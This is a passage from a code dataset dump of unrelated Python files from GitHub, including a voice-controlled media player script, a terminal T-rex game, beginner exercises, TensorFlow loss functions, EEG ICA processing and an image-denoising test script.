'pause',\n\t}\n\t\n\tdef parse(self, word):\n\t\tif word in self.commands:\n\t\t\treturn 'banshee --no-present --%s %% ' % self.commands[word]\n\nclass CommandAndControl:\n\t\n\tdef __init__(self, file_object):\n\t\t\n\t\tself.ubuntu = Ubuntu();\n\t\tself.tofik = Tofik();\n \n\t\t# Determine which media player to use\n\t\tif os.system('ps xa | grep -v grep | grep banshee >/dev/null') == 0:\n\t\t\tself.mediaplayer = Banshee()\n\t\telif os.system('ps xa | grep -v grep | grep rhythmbox >/dev/null') == 0:\n\t\t\tself.mediaplayer = Rhythmbox()\n\t\telif os.system('which banshee >/dev/null') == 0:\n\t\t\tself.mediaplayer = Banshee()\n\t\t\tos.system('bash -c \"nohup banshee >/dev/null 2>&1 <&1 & disown %%\"')\n\t\telif os.system('which rhythmbox >/dev/null') == 0:\n\t\t\tself.mediaplayer = Rhythmbox()\n\t\telse:\n\t\t\tprint('Couldn\\'t find a supported media player. ' \\\n\t\t\t\t'Please install Rhythmbox or Banshee.')\n\t\t\tsys.exit(1)\n\t\tprint('Taking control of %s media player.' % self.mediaplayer.name)\n\t\t\n\t\tstartstring = 'sentence1: <s> '\n\t\tendstring = ' </s>'\n\t\t\n\t\twhile 1:\n\t\t\tline = file_object.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tif 'missing phones' in line.lower():\n\t\t\t\tprint('Error: Missing phonemes for the used grammar file.')\n\t\t\t\tsys.exit(1)\n\t\t\tif line.startswith(startstring) and line.strip().endswith(endstring):\n\t\t\t\tself.parse(line.strip('\\n')[len(startstring):-len(endstring)])\n\t\n\tdef parse(self, line):\n\t\t# Parse the input\n\t\tparams = [param.lower() for param in line.split() if param]\n\t\tif not '-q' in sys.argv and not '--quiet' in sys.argv:\n\t\t\tprint('Recognized input:', ' '.join(params).capitalize())\n\n\t\t# Execute the command, if recognized/supported\n\t\t# Before any execution check is listening switched on\n\t\tinputText = ' '.join(params)\n\t\t\n\t\tself.tofik.parse(inputText)\n\t\t\t\t\n\t\tif (self.tofik.voiceOn):\n\t\t\tcommand = self.mediaplayer.parse(inputText)\n\t\t\tubuntuCommand = self.ubuntu.parse(inputText)\n\t\t\ttofikCommand = self.tofik.parse(inputText) \t\t\t\n\t\t\tif command:\n\t\t\t\tos.system(\"killall notify-osd; \" + command)\n\t\t\telif ubuntuCommand:\n\t\t\t\tos.system(\"killall notify-osd; \" + ubuntuCommand)\t\t\t\t\n\t\t\telif tofikCommand:\n\t\t\t\tpass\t\t\t\t\n\t\t\t#elif not '-q' in sys.argv and not '--quiet' in sys.argv:\n\t\t\t#\tprint('Command not supported by %s.' % self.mediaplayer.name)\n\t\telse:\n\t\t\tprint(\"Listening is disabled - say 'voice on' to active Tofik\")\n\nif __name__ == '__main__':\n\ttry:\n\t\tCommandAndControl(sys.stdin)\n\texcept KeyboardInterrupt:\n\t\tsys.exit(1)\n","repo_name":"nisao/tofik","sub_path":"python/tofik.py","file_name":"tofik.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23793037871","text":"\nfrom random import randint\nfrom time import sleep\nimport logging\n\n# delays \nSHORT_DELAY = (30000/1000000.0)\nDELAY = (50000/1000000.0)\nLONG_DELAY = (60000/1000000.0)\n\nground = \"___________________&______.._______________;.,,,_____________________&______.._____________________\"\n\nground_type = [\"____\",\"_&__\",\"__;_\",\"....\"]\nGROUND_FLAT = 0\nGROUND_GRASS = 1\nGROUND_ROCK = 2\nGROUND_BROKEN = 3\nNUM_GND = 4\nG_Y,G_X = 20,2 \n\nCACTI_LEVEL_0 = [\" \",\"# | \",\"#_|_#\",\" | \"]\nCACTI_LEVEL_1 = [\" \",\"#_| #\",\"|_# \",\" | \"]\nCACTI_LEVEL_2 = [\"# | #\",\"#_| #\",\"|_# \",\" | \"]\nCACTI_LEVEL_3 = [\"# | #\",\"# |_#\",\"#_| \",\" | \"]\nCACTI_LEVEL_4 = [\"# | \",\"# | #\",\"#_|_#\",\" | \"]\n\nCACTI_OFFSET = 96\n\nclass Cloud:\n def __init__(self,window):\n self.cloud = [\"@@@\",\"..@@@@@....\"]\n self.image = \"\"\n self.window = window\n \n def draw(self,y,x):\n sleep(0.01)\n self.window.addstr(y,x,self.cloud[0])\n self.window.addstr(y+1,x-3,self.cloud[1])\n \n def update(self):\n n = randint(1,3)\n for count in xrange(n):\n y,x = randint(5,10),randint(30,70)\n self.draw(y,x)\n\nclass Cactus:\n def __init__(self,window):\n self.window = window\n \n def draw(self,y,x,image):\n self.window.addstr(y-3,x, image[0])\n self.window.addstr(y-2,x, image[1])\n self.window.addstr(y-1,x, image[2])\n self.window.addstr(y,x, image[3])\n \n def update(self,y,x,image):\n # set cacti level based on game level\n self.draw(y,x+CACTI_OFFSET,image)\n\nclass Ground:\n def __init__(self,window):\n global ground, ground_type\n self.ground = ground\n self.window = window\n self.cactus = []\n \n def draw(self,y,x,image):\n self.window.addstr(y,x,image)\n \n def add_cactus(self):\n self.cactus.append(Cactus(self.window))\n\n def update(self,level=0,isCactus=False):\n global SHORT_DELAY, NUM_GND, G_Y, G_X,CACTI_OFFSET\n # prepare ground using random ground types\n # these ground type have visual value and \n # donot change the gameplay in any way\n image = \"\"\n gtype_idx = int(randint(0,NUM_GND)%NUM_GND)\n image = self.ground + ground_type[gtype_idx]\n self.ground = image[4:98]\n sleep(SHORT_DELAY)\n # draw the initial ground \n self.draw(G_Y,G_X,self.ground)\n\n # Draw cactus if isCactus flag is true, \n # this flag is set True after some gametime has elapsed\n if isCactus:\n CACTI_OFFSET = (CACTI_OFFSET- 4)\n if (CACTI_OFFSET <= 0):\n CACTI_OFFSET = 96\n \n c = [CACTI_LEVEL_0,CACTI_LEVEL_1,CACTI_LEVEL_2,CACTI_LEVEL_3,CACTI_LEVEL_4]\n self.add_cactus()\n image = c[(level%3)]\n self.cactus[0].update(20,1,image)\n\n return [20,1+CACTI_OFFSET]\n\n\n","repo_name":"sukhoi/trex-game","sub_path":"Scene.py","file_name":"Scene.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12472484972","text":"import random\nnum=random.randint(1,21)\nfor i in range(5):\n guess=int(input(\"Enter your guess no.(betweem 1 and 20) : \"))\n if guess==num:\n print(f\"YOu have guessed the correct number i.e {guess}\")\n break\n elif guess>num:\n print(\"Your guess was high, guess lower values\")\n elif guess<num:\n print(\"Your guess was low, guess higher values\")\n\nprint(f\"The correct answer was {num}\")\n\n \n","repo_name":"Access7-s/Python-Exercise","sub_path":"Python exercises Beginners/randomnumberguess.py","file_name":"randomnumberguess.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9914475143","text":"# Ex_9\r\n\r\n# declaration of number\r\nnumbers=[1,2,3,4,5,6,7]\r\n# result list\r\nres=[]\r\n# Checking the for loop \r\nfor i in numbers:\r\n # calculate square and add to the result list\r\n res.append(i * i)\r\nprint(res)\r\n\r\n\r\n\r\n# output\r\n\r\n\r\n# [1, 4, 9, 16, 25, 36, 49]","repo_name":"kalaiselvam-ganesan/Python_programs","sub_path":"Ex_9.py","file_name":"Ex_9.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25985030169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDistribution functions\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom network.graphtils import repeat\n#from network.layers import fully_connected\n\ndef get_number_output_parameters(hps):\n ''' returns the number of necessary output distribution parameters '''\n if hps.output == 'deterministic':\n return 1\n elif hps.output == 'gaussian':\n return 2\n elif hps.output == 'categorical':\n return hps.n_bins\n elif hps.output == 'mog':\n return hps.n_mix * 3\n\ndef kl_divergence(mu1,sigma1,mu2,sigma2):\n ''' kl divergence for two univariate gaussians '''\n return tf.log(sigma2/sigma1) + (tf.square(sigma1) + tf.square(mu1 - mu2))/(2*tf.square(sigma2)) - 0.5\n\ndef gaussian_ce(mu1,sigma1,mu2,sigma2):\n ''' crossentropy H(q(mu1,sigma1),p(mu2,sigma2)) '''\n return tf.log(2*np.pi*tf.square(sigma2))/2 + (tf.square(sigma1) + tf.square(mu1 - mu2))/(2*tf.square(sigma2))\n\ndef one_kl(mu1,sigma1,mu2,sigma2):\n return 0.5 * tf.log(np.pi*2 * tf.square(sigma2)) + (tf.square(sigma1) + tf.square(mu1 - mu2))/(2*tf.square(sigma2))\n\ndef bhattacharyya_distance(mu1,sigma1,mu2,sigma2):\n ''' bhattacharyya distance for two univariate gaussians '''\n return (tf.square(mu1-mu2)/(tf.square(sigma1) + tf.square(sigma2)))/4.0 + tf.log((tf.square(sigma1)/tf.square(sigma2) + tf.square(sigma2)/tf.square(sigma1) + 2.0)/4.0)/4.0\n\ndef hellinger_distance(mu1,sigma1,mu2,sigma2):\n ''' hellinger distance for two univariate gaussians '''\n return 1.0 - tf.sqrt(2*sigma1*sigma2/(tf.square(sigma1)+tf.square(sigma2))) * tf.exp(-0.25 * tf.square(mu1-mu2)/(tf.square(sigma1)+tf.square(sigma2)))\n\ndef output_distribution(z,hps,p_dropout,seed,kl,k):\n ''' Specifies losses and sampling operations for top graph layer '''\n if hps.output == 'deterministic':\n # params\n mu = z\n param = mu\n #dist\n mean = mu\n sample = mu\n # loss\n y = y_rep = tf.placeholder(\"float32\", shape=[None,1],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k)\n error = tf.reduce_sum(tf.square(mu - y_rep),axis=1)\n loss = tf.reduce_mean(error) + kl\n #loss = tf.losses.mean_squared_error(mu,y) + kl\n \n elif hps.output == 'gaussian':\n # params\n mu = z[:,0][:,None]\n log_sigma = z[:,1][:,None] + hps.sd_output_bias\n #sigma = tf.exp(log_sigma)\n sigma = tf.nn.softplus(log_sigma) \n # dist\n outdist = tf.contrib.distributions.Normal(mu,sigma)\n sample = outdist.sample()\n mean = mu\n param = tf.concat([mu,sigma],axis=1)\n \n # loss \n if hps.loss == 'analytic':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,2],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n y_dist = tf.contrib.distributions.Normal(y_rep[:,0][:,None],y_rep[:,1][:,None])\n if hps.distance == 'kl':\n #kl_output = tf.contrib.distributions.kl_divergence(outdist,y_dist)\n kl_output = tf.contrib.distributions.kl_divergence(y_dist,outdist)\n #kl_output = kl_divergence(y[:,0],y[:,1],mu,sigma) # this should be the correct one? \n #kl_output = kl_divergence(mu,sigma,y[:,0],y[:,1])\n #kl_output = one_kl(y[:,0],y[:,1],mu,sigma)\n #kl_output = one_kl(mu,sigma,y[:,0],y[:,1])\n elif hps.distance == 'bhat':\n kl_output = bhattacharyya_distance(mu,sigma,y_rep[:,0],y_rep[:,1])\n elif hps.distance == 'hel':\n kl_output = hellinger_distance(mu,sigma,y_rep[:,0],y_rep[:,1])\n elif hps.distance == 'ce':\n kl_output = y_dist.cross_entropy(outdist)\n #kl_output = gaussian_ce(mu,sigma,y_rep[:,0],y_rep[:,1])\n error = tf.reduce_sum(kl_output,axis=1)\n loss = tf.reduce_mean(error) + kl\n elif hps.loss == 'sample':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,1],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n error = -1.0 * outdist.log_prob(y_rep)\n loss = tf.reduce_mean(error) + kl\n \n elif hps.output == 'categorical':\n # params\n logits = z\n param = tf.nn.softmax(logits)\n # dist\n outdist = tf.contrib.distributions.Categorical(logits=logits)\n sample = tf.reshape(outdist.sample(1),[-1,1])\n mean = None\n\n # loss \n if hps.loss == 'analytic':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,hps.n_bins],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n #loss = -tf.reduce_sum(y * tf.log(param),axis=1)\n #loss = tf.reduce_mean(loss) + kl\n error = tf.nn.softmax_cross_entropy_with_logits(labels=y_rep,logits=logits)\n loss = tf.reduce_mean(error) + kl\n elif hps.loss == 'sample':\n y = y_rep = tf.placeholder(\"int32\", shape=[None,1],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n error = -1.0 * tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y_rep,logits=tf.expand_dims(logits,1))\n loss = tf.reduce_mean(error) + kl\n\n elif hps.output == 'mog':\n # params\n logits = z[:,:hps.n_mix]\n pi = tf.nn.softmax(logits)\n mu_p = z[:,hps.n_mix:(2*hps.n_mix)]\n bias = tf.tile(tf.constant(np.arange(hps.n_mix)-int(hps.n_mix/2),dtype='float32')[None,:],[tf.shape(mu_p)[0],1])\n mu_p = mu_p + bias \n\n log_sigma = z[:,(2*hps.n_mix):(3*hps.n_mix)] + hps.sd_output_bias\n sigma_p = tf.nn.softplus(log_sigma) \n param = tf.concat([pi,mu_p,sigma_p],axis=1)\n\n # dist\n p_dist = tf.contrib.distributions.Categorical(probs=pi)\n n_dist = []\n for i in range(hps.n_mix):\n n_dist.append(tf.contrib.distributions.Normal(mu_p[:,i],sigma_p[:,i])) \n outdist = tf.contrib.distributions.Mixture(cat=p_dist,components=n_dist)\n sample = tf.reshape(outdist.sample(1),[-1,1])\n mean = outdist.mean()[:,None]\n\n # construct loss \n if hps.loss == 'analytic':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,hps.n_mix*3],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n qi,mu_q,sigma_q = tf.split(y_rep,3,axis=1)\n error = l2loss_gmm(pi,mu_p,sigma_p,qi,mu_q,sigma_q,hps.n_mix)\n loss = tf.reduce_mean(error) + kl\n elif hps.loss == 'sample':\n y = y_rep = tf.placeholder(\"float32\", shape=[None,1],name='y')\n if hps.uncer == 'vi':\n y_rep = repeat(y,k) \n error = -1.0 * outdist.log_prob(y_rep)\n loss = tf.reduce_mean(error) + kl\n \n return y,error,loss,sample,mean,param\n\ndef l2loss_gmm(pi,mu_p,sigma_p,qi,mu_q,sigma_q,n_mix):\n ''' Calculate L2 distance between two Gaussian mixture p(y) and q(y) '''\n piqi = tf.concat([pi,-1.0*qi],axis=1)\n s_pq = tf.concat([sigma_p,sigma_q],axis=1)\n mu_pq = tf.concat([mu_p,mu_q],axis=1)\n p_matrix = tf.einsum('ai,aj->aij',piqi,piqi) # outer product\n s_matrix = tf.tile(tf.expand_dims(s_pq,-1),[1,1,n_mix*2]) + tf.tile(tf.expand_dims(s_pq,1),[1,n_mix*2,1])\n distr = tf.contrib.distributions.Normal(loc = tf.tile(tf.expand_dims(mu_pq,1),[1,n_mix*2,1]), scale = s_matrix)\n pdfs = distr.prob(tf.tile(tf.expand_dims(mu_pq,-1),[1,1,n_mix*2]))\n return tf.reduce_sum(p_matrix * pdfs,axis=[1,2])\n\n#def kl_gmm(pi,mu_p,sigma_p,qi,mu_q,sigma_q,n_mix):\n# ''' Sfikas et al, 2005 '''\n# V = 1.0/(1.0/sigma_p + 1.0/sigma_q)\n\nclass TransformDiscrete():\n ''' Transform categorical variable between integer values and true bins '''\n \n def __init__(self,n=51,min_val=-10,max_val=10):\n self.n = n\n self.min_val = min_val\n self.max_val = max_val\n self.edges = np.linspace(min_val,max_val,n+1)\n self.plot_edges = np.linspace(min_val,max_val,n+1)\n self.means = (self.edges[:-1] + self.edges[1:])/2\n self.edges[0] = -np.Inf\n self.edges[-1] = np.Inf\n self.bin_width = (max_val - min_val)/n\n\n def to_index(self,value):\n ''' from list of values to list of bin indices '''\n if type(value) == float:\n value = [value]\n return np.array([np.where(val>self.edges)[0][-1] for val in value])\n\n def to_value(self,indices):\n ''' from list of bin indices to list of values '''\n if type(indices) == int:\n indices = [indices]\n try: \n return np.array([self.means[index] for index in indices])\n except:\n raise ValueError('bin index probably too large') \n\ndef gaussian_diag_logps(mean, logvar, sample=None):\n if sample is None:\n noise = tf.random_normal(tf.shape(mean))\n sample = mean + tf.exp(0.5 * logvar) * noise\n return tf.clip_by_value(-0.5 * (np.log(2 * np.pi) + logvar + tf.square(sample - mean) / tf.exp(logvar)),-(10e10),10e10)\n \nclass DiagonalGaussian(object):\n def __init__(self, mean, logvar, sample=None):\n self.mean = mean\n self.logvar = logvar\n\n if sample is None:\n noise = tf.random_normal(tf.shape(mean))\n sample = mean + tf.exp(0.5 * logvar) * noise\n self.sample = sample\n\n def logps(self, sample):\n return gaussian_diag_logps(self.mean, self.logvar, sample)\n","repo_name":"tmoer/return_distribution_exploration","sub_path":"network/distributions.py","file_name":"distributions.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35748186001","text":"from collections import deque\nimport sys\ninput = sys.stdin.readline\ndr = [(0,1),(0,-1),(1,0),(-1,0)]\n\nn = int(input())\nvis1 = [[0 for _ in range(n)] for _ in range(n)]\nvis2 = [[0 for _ in range(n)] for _ in range(n)]\n\ndef bfs(y,x,vis,color,flag = False):\n q = deque([(y,x)])\n vis[y][x] = 1\n color_pool = []\n if flag:\n if color == 'R' or color == 'G':\n color_pool = ['R','G']\n else:\n color_pool = ['B']\n else:\n color_pool = [color]\n while q:\n curr_y,curr_x = q.popleft()\n for dy,dx in dr:\n ny = dy + curr_y\n nx = dx + curr_x\n if (0 <= ny < n and 0 <= nx < n) and not vis[ny][nx] and arr[ny][nx] in color_pool:\n q.append((ny,nx))\n vis[ny][nx] = 1\narr = []\nfor _ in range(n):\n row = list(input().strip())\n arr.append(row)\n\ncount1 = 0\nfor r in range(n):\n for c in range(n):\n if not vis1[r][c]:\n color = arr[r][c]\n count1 += 1\n bfs(r,c,vis1,color)\n\ncount2 = 0\nfor r in range(n):\n for c in range(n):\n if not vis2[r][c]:\n color = arr[r][c]\n count2 += 1\n bfs(r,c,vis2,color,True)\n\nprint(count1,count2)\n","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/10027_적록색약.py","file_name":"10027_적록색약.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18108895672","text":"import numpy as np\nimport pandas as pd\nimport mne\nfrom mne import create_info\nfrom mne.channels import read_montage\nfrom mne.io import RawArray\nimport csv\nfrom PIL import Image\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nplt.ioff()\nmatplotlib.rcParams.update({'figure.max_open_warning': 0})\n\n\ndef load_raw_eeg(filename):\n data = pd.read_csv(filename)\n ch_names = list(data.columns[1:])\n\n data = 1e-7 * np.array(data[ch_names]).T\n ch_types = ['eeg'] * len(ch_names)\n montage = read_montage('standard_1020', ch_names)\n\n ch_locations = []\n for i in range(len(ch_names)):\n ch_name = ch_names[i]\n ch_location = montage.pos[i]\n ch_locations.append([ch_name, ch_location[0], ch_location[1], ch_location[2]])\n\n info = create_info(ch_names, sfreq=512, ch_types=ch_types, montage=montage)\n\n return RawArray(data, info, verbose=False), ch_locations\n\n\ndef get_ica_weights_map(ica):\n components = list(range(ica.n_components_))\n maps = np.dot(ica.mixing_matrix_[:, components].T,\n ica.pca_components_[:ica.n_components_])\n return maps\n\n\ndef writecsv(data, filename):\n with open(filename, 'w', newline='') as csv_file:\n writer = csv.writer(csv_file, delimiter='\\t')\n for data_row in data:\n writer.writerow(data_row)\n\n\ndef process_eeg(data_filename, locations_filename, ica_weights_filename, plot_filenames):\n raw, ch_locations = load_raw_eeg(data_filename)\n writecsv(ch_locations, locations_filename)\n\n ch_number = len(raw.ch_names)\n\n ica = mne.preprocessing.ICA(n_components=ch_number)\n ica.fit(raw)\n\n for i in range(ch_number):\n plot_to_save = ica.plot_components(i, show=False)\n plot_filename = plot_filenames[i]\n plot_filenames.append(plot_filename)\n plot_to_save.savefig(plot_filename)\n\n # cropping images\n plot_to_save = Image.open(plot_filename)\n plot_to_save = plot_to_save.crop((25, 56, 205, 232))\n plot_to_save.save(plot_filename)\n\n weights_map = get_ica_weights_map(ica)\n np.savetxt(ica_weights_filename, weights_map, delimiter=', ')\n\n plt.close('all')\n","repo_name":"Evgenius2020/icaMark","sub_path":"labeling/process_eeg.py","file_name":"process_eeg.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71980425768","text":"#BEGIN /* Algoritmo Genetico Simple */\r\n#\tGenerar una poblacion inicial.\r\n#\tComputar la funcion de evaluacion de cada individuo\r\n#\tWHILE NOT Terminado DO\r\n#\tBEGIN /* Producir nueva generacion */\r\n#\t\tFOR Taman˜o poblacion/2 DO \r\n#\t\tBEGIN /*Ciclo Reproductivo *\r\n#\t\t\tSeleccionar dos individuos de la anterior generacion, para el cruce (probabilidad de seleccion proporcional a la funcion de evaluacion del individuo).\r\n#\t\t\tCruzar con cierta probabilidad los dos individuos obteniendo dos descendientes.\r\n#\t\t\tMutar los dos descendientes con cierta probabilidad\r\n#\t\t\tComputar la funcion de evaluacion de los dos descendientes mutados.\r\n#\t\t\tInsertar los dos descendientes mutados en la nueva generacion.\r\n#\t\tEND\r\n#\t\tIF la poblacion ha convergido THEN \r\n#\t\t\tTerminado := TRUE\r\n#\tEND\r\n#END\r\nfrom clases.claseGenetico import *\r\n\r\ndef controlProfesores():\r\n\tentrada = open(\"entradas/profesores.csv\",'r')\r\n\tprofesores = entrada.readline()\r\n\tvectorProfesores = profesores.split(\"\\n\")\r\n\tnombreAsignaturas = vectorProfesores[0].split(\";\")\r\n\tdel nombreAsignaturas[0]\r\n\tdel vectorProfesores[0]\r\n\r\n\tdocentes = []\r\n\tvectorProfesores.pop()\r\n\tfor i in VectorProfesores:\r\n\t\tauxProfesores = i.split(\";\")\r\n\t\twhile('' in auxProfesores):\r\n\t\t\tauxProfesores.remove('')\r\n\t\tnombreProfesores = i[0]\r\n\tentrada.close()\r\n\r\n\r\ndef receptorGenetico(listaGrados):\r\n\tgrados=[]\r\n\tgrados = listaGrados\r\n\tinicializador(grados)\r\n\r\ndef inicializador(grados):\r\n\tprint(\"iniciando el Algoritmo\")\r\n\tgeneracion = [\"1_generacion\",\"2_generacion\",\"3_generacion\",\"4_generacion\",\"5_generacion\"]\r\n\tindiceGrado=0\r\n\tfor i in grados:\r\n\t\tprint(\"Algoritmo para el Grado: \" + i)\r\n\t\tindiceGrado = indiceGrado + 1\r\n\t\tfor j in generacion: \r\n\t\t\tcrearPoblacion(i,j,indiceGrado)\r\n\t\t\tprint(\"la \" + j + \" a sido añadida para el grado: \" + i)\r\n\r\n\t#controlProfesores()","repo_name":"aliriox/HPC","sub_path":"Proyecto HPC/algoritmoGenetico.py","file_name":"algoritmoGenetico.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43000027882","text":"# names = input(\"Enter names separated by commas: \").title().split(\",\")\n# assignments = input(\"Enter assignment counts separated by commas: \").split(\",\")\n# grades = input(\"Enter grades separated by commas: \").split(\",\")\n#\n#\n# message = \"Hi {},\\n\\nThis is a reminder that you have {} assignments left to \\\n# submit before you can graduate. You're current grade is {} and can increase \\\n# to {} if you submit all assignments before the due date.\\n\\n\"\n#\n# for name, assignment, grade in zip(names, assignments, grades):\n# print(message.format(name, assignment, grade, int(grade) + int(assignment)*2))\n#####################################################################################################\n# result = 0\n# while(result == 0):\n# try:\n# num1= int(input(\"Enter First Input : \"))\n# num2= int(input(\"Enter Second Input : \"))\n# result = num1 / num2\n# print(result)\n#\n# except ValueError:\n# print(\"You Entered incorrect input You have to Enter a Number data type\")\n# except ZeroDivisionError:\n# print(\"You Shouldn't divide by ZERO\")\n# print(\"Continue \")\n######################################################################################\n\nf = open('saud.txt', 'w')\nf.write(\"This is an additional txt\")\nf.close()\n\nf = open('a.txt', 'r')\nfile_data = f.read()\nf.close()\nprint(file_data)\n##############################################################################################\n","repo_name":"Ahmedtarekpage/Python_Course","sub_path":"Day 5.py","file_name":"Day 5.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3139277013","text":"import cv2\nimport os\nimport argparse\nimport glob\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n# from IRCNN import DnCNN\nfrom utils import *\nfrom middle_and_lower import BRDNet\n# from IRCNN_9 import DnCNN\n\nimport time\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nparser = argparse.ArgumentParser(description=\"DnCNN_Test\")\nparser.add_argument(\"--num_of_layers\", type=int, default=20, help=\"Number of total layers\")\nparser.add_argument(\"--logdir\", type=str, default=\"logs/middle_and_lower_patch5050-4744-S-25\", help='path of log files')\nparser.add_argument(\"--test_data\", type=str, default='Set12', help='test on Set12 or Set68 from gray image,'\n 'test on Kodak24 or CBSD68 or McMaster from color image')\nparser.add_argument(\"--test_noiseL\", type=float, default=25, help='noise level used on test set')\nparser.add_argument(\"--test_epochs\", type=int, default=50, help=\"Number of test epochs\")\nparser.add_argument(\"--channels\", type=int, default=1, help='Number of input channels')\nparser.add_argument(\"--color\", type=bool, default=False, help=\"color or gray\")\nopt = parser.parse_args()\n\ndef normalize(data):\n return data/255.\n\ndef main():\n\n Total_Max_PSNR = 0\n start_time = time.time()\n for i in range(30, 51): ### 导入 net 1~50.pth 权重\n\n str_1 = 'net ' + str(i) + '.pth'\n # Build model\n print('\\nLoading model ...' + str_1)\n\n # net = DnCNN(channels=opt.channels) #### 运行IRCNN时,应该把 num_of_layers=opt.num_of_layers 删除\n net = BRDNet(channels=opt.channels)\n # model = net.cuda()\n device_ids = [0]\n model = nn.DataParallel(net, device_ids=device_ids).cuda()\n model.load_state_dict(torch.load(os.path.join(opt.logdir, str_1))) #### 加载权重\n # model.load_state_dict(torch.load(os.path.join(opt.logdir, 'net 40.pth'))) #### 加载权重\n print('\\nLoading model ...finished\\n')\n\n Max_PSNR = 0\n\n for x in range(opt.test_epochs): ###测试50轮test 的 PSNR的值,保存最大值\n\n model.eval() ## 验证模型\n # load data info\n print('Loading data info ...\\n') ### 数据信息\n files_source = glob.glob(os.path.join('data', opt.test_data, '*.png' or '*.bmp' or '*.jpg'))\n files_source.sort()\n # process data\n\n psnr_test = 0\n # ssim_test = 0\n\n\n for f in files_source:\n # image\n Img = cv2.imread(f)\n\n # Img = np.transpose(Img, (2, 0, 1)) ## 彩色图\n # Img = normalize(np.float32(Img))\n # Img = np.expand_dims(Img, 0)\n #\n # # TODO\n # # Img = normalize(np.float32(Img[:,:,0])) ## 灰度图\n # # Img = np.expand_dims(Img, 0)\n # # Img = np.expand_dims(Img, 1)\n if opt.color: ## 彩色图���理\n Img = cv2.cvtColor(Img, cv2.COLOR_BGR2RGB)\n Img = np.transpose(Img, (2, 0, 1))\n Img = normalize(np.float32(Img))\n Img = np.expand_dims(Img, 0)\n # print(Img.shape)\n else: ## 灰度图处理\n Img = normalize(np.float32(Img[:,:,0]))\n Img = np.expand_dims(Img, 0)\n Img = np.expand_dims(Img, 1)\n\n\n # clean image\n ISource = torch.Tensor(Img)\n # noise\n noise = torch.FloatTensor(ISource.size()).normal_(mean=0, std=opt.test_noiseL/255.)\n # noisy image\n INoisy = ISource + noise\n # move to GPU\n ISource, INoisy = Variable(ISource.cuda()), Variable(INoisy.cuda())\n\n\n\n with torch.no_grad(): # this can save much memory\n Out = torch.clamp(INoisy-model(INoisy), 0., 1.)\n\n ## if you are using older version of PyTorch, torch.no_grad() may not be supported\n # ISource, INoisy = Variable(ISource.cuda(),volatile=True), Variable(INoisy.cuda(),volatile=True)\n # Out = torch.clamp(INoisy-model(INoisy), 0., 1.)\n\n psnr = batch_PSNR(Out, ISource, 1.)\n # ssim = structural_similarity(Out, ISource,multichannel=True)\n\n psnr_test += psnr\n # ssim_test += ssim\n\n print(\" ”%s “ PSNR : %f \" % (f, psnr))\n # print(\" ”%s “ PSNR : %f SSIM :%f \" % (f, psnr, ssim))\n\n psnr_test /= len(files_source)\n # ssim_test /= len(files_source)\n\n # 记录每轮上的psnr的平均值\n print(\"\\n***************~~~~~~~~**************第 %d 轮 PSNR on test data: %.3f\" % (x+1,psnr_test))\n # print(\"\\n***************~~~~~~~~**************第 %d 轮 PSNR on test data: %.3f\" % (i + 1, ssim_test))\n\n if psnr_test > Max_PSNR:\n Max_PSNR = psnr_test\n j = x+1\n # if ssim_test > Max_SSIM:\n # Max_SSIM = ssim_test\n\n # 记录每个 net *.pth 上测试50轮上的psnr的最大值\n print(\"\\n********************************************************第 %d 轮 \"% j + \"Max_PSNR on \"+str_1+\" test data: %.3f\" % Max_PSNR)\n # print(\"\\n*******************************************~~~~~~~~~~~~~~~~~~************* Max_SSIM on test data: %.3f\" % Max_SSIM)\n\n\n\n if Max_PSNR > Total_Max_PSNR:\n Total_Max_PSNR = Max_PSNR\n str_2 = str_1\n k = j\n ## 记录全部net *.pth 上,最大的psnr值\n print(\"\\n*******************************************~~~~~~~~~~~~~~~~~~*************第 %d 轮 \"% k + \"Total_Max_PSNR on \"+str_2+\" test data: %.3f \" % Total_Max_PSNR )\n # # print(\"\\n*******************************************~~~~~~~~~~~~~~~~~~************* Max_SSIM on test data: %.3f\" % Max_SSIM)\n end2_time = time.time()\n print(\"\\n***************************** 时间消耗: %.3f 小时\" % ((end2_time-start_time)/3600))\n\nif __name__ == \"__main__\":\n 